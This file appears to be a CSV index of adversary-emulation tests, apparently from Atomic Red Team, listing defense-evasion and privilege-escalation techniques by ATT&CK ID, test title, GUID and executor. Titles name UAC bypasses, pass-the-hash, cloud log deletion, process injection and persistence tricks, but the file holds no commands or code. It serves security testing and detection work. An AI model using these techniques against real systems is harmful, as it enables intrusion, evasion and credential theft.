defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,1,AWS - CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,4,AWS - Disable CloudTrail Logging Through Event Selectors using Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,5,AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus,22d89a2f-d475-4895-b2d4-68626d49c029,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,6,AWS - Remove VPC Flow Logs using Stratus,93c150f5-ad7b-4ee3-8992-df06dec2ac79,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,Office 365 - Set Audit Bypass For a Mailbox,c9a2f6fe-7197-488c-af6d-10c782121ca6,powershell
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,3,Binary simply packed by UPX,b16ef901-00bb-4dda-b4fc-a04db5067e20,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,4,"Binary packed by UPX, with modified headers",4d46e16b-5765-4046-9f25-a600d3e65e4d,sh
defense-evasion,T1036.006,Masquerading: Space after Filename,1,Space After Filename (Manual),89a7dd26-e510-4c9f-9b15-f3bae333360f,manual
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
defense-evasion,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
defense-evasion,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,4,Create ADS PowerShell,0045ea16-ed3c-4d4c-a9ee-15e44d1560d1,powershell
defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
privilege-escalation,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
privilege-escalation,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
privilege-escalation,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
privilege-escalation,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
privilege-escalation,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
privilege-escalation,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
privilege-escalation,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
privilege-escalation,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
privilege-escalation,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
privilege-escalation,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
